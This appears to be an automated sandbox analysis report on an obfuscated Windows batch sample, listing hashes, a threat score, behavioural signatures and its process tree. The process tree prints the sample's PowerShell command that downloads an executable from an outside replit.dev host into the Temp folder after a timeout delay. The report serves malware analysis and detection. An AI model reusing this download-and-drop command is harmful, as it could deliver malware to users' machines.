Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
09-11-2024 14:22
Static task
static1
Behavioral task
behavioral1
Sample
New Text Document_obf.bat
Resource
win7-20241010-en
5 signatures
150 seconds
General
-
Target
New Text Document_obf.bat
-
Size
1KB
-
MD5
afe542deaafa2826040b1aafd7ce94bf
-
SHA1
1b34eea5ba992877fbba707f6b6320b6974b245c
-
SHA256
137771c08a3b7e830d500119028bcd379f07a1f9f59f3dd6661790c40f941524
-
SHA512
c6df2a12264e9f9ffea5e080beb9874a590a7286f43f901096b89952df534082094052ff7b79294928695af3cea1eb433a616e686e85d922e96fe649db483ff2
Score
8/10
Malware Config
Signatures
-
pid Process 1760 powershell.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3036 timeout.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1760 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1760 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2128 wrote to memory of 3036 2128 cmd.exe 31 PID 2128 wrote to memory of 3036 2128 cmd.exe 31 PID 2128 wrote to memory of 3036 2128 cmd.exe 31 PID 2128 wrote to memory of 1760 2128 cmd.exe 32 PID 2128 wrote to memory of 1760 2128 cmd.exe 32 PID 2128 wrote to memory of 1760 2128 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\New Text Document_obf.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\system32\timeout.exetimeout /t 2 REM Wait for 2 seconds to simulate processing2⤵
- Delays execution with timeout.exe
PID:3036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { Invoke-WebRequest -Uri 'https://209a4381-e3eb-466a-9efc-fca8d71e6314-00-2bl68nwmi4jw4.kirk.replit.dev/nostart.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\nostart.exe' } catch { Write-Host 'Failed to download file: $_'; exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760
-